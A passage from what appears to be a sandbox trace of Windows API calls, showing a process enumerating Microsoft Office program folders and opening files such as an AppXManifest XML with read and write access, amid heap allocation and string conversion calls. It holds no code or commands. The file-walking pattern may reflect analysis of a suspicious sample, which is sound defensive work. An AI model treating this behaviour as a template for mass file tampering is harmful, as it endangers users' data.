Flags=0x0, Size=0x20) returned 0x883b0 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.469] AreFileApisANSI () returned 1 [0098.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0098.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75b70 [0098.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 55 [0098.469] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd502d600, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0xda9a8629, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd502d600, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x8df0)) returned 1 [0098.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0098.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0098.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.469] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.469] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x6c, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6a3b8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x6c, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓跰")) returned 0 [0098.469] FindClose (in: hFindFile=0x78350 | out: hFindFile=0x78350) returned 1 [0098.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0098.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0098.469] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0098.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.470] AreFileApisANSI () returned 1 [0098.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests", lpUsedDefaultChar=0x0) returned 51 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0098.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.470] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0098.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0098.471] AreFileApisANSI () returned 1 [0098.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0098.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x462e8 [0098.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x462e8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests") returned 51 [0098.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests" (normalized: "c:\\program files\\microsoft office\\packagemanifests"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.471] GetLastError () returned 0x5 [0098.471] GetLastError () returned 0x5 [0098.471] SetLastError (dwErrCode=0x5) [0098.471] GetLastError () returned 0x5 [0098.471] SetLastError (dwErrCode=0x5) [0098.471] GetLastError () returned 0x5 [0098.471] SetLastError (dwErrCode=0x5) [0098.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0098.471] AreFileApisANSI () returned 1 [0098.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0098.471] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46048 [0098.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46048, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests") returned 51 [0098.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests" (normalized: "c:\\program files\\microsoft office\\packagemanifests"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.472] GetLastError () returned 0x5 [0098.472] GetLastError () returned 0x5 [0098.472] SetLastError (dwErrCode=0x5) [0098.472] GetLastError () returned 0x5 [0098.472] SetLastError (dwErrCode=0x5) [0098.472] GetLastError () returned 0x5 [0098.472] SetLastError (dwErrCode=0x5) [0098.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0098.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0098.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0098.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0098.472] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.472] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.472] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.472] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0098.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0098.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0098.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0098.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0098.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0098.472] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="root", cAlternateFileName="")) returned 1 [0098.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0098.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0098.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0098.472] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0098.472] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78410 [0098.477] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf982bd9c, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.479] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834f7581, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834f7581, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5e91c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", cAlternateFileName="APA05A~1.XML")) returned 1 [0098.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0098.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0098.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0098.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0098.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0098.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0098.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88fe8 [0098.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88e18 [0098.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88fe8 | out: hHeap=0x20000) returned 1 [0098.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88e18 | out: hHeap=0x20000) returned 1 [0098.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.480] AreFileApisANSI () returned 1 [0098.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0098.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0098.480] AreFileApisANSI () returned 1 [0098.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 105 [0098.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.481] GetFileType (hFile=0x35c) returned 0x1 [0098.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.482] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.482] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.482] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.482] CloseHandle (hObject=0x35c) returned 1 [0098.482] AreFileApisANSI () returned 1 [0098.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75d50, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 105 [0098.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.483] GetFileType (hFile=0x35c) returned 0x1 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.483] CloseHandle (hObject=0x35c) returned 1 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.483] RtlAllocateHeap 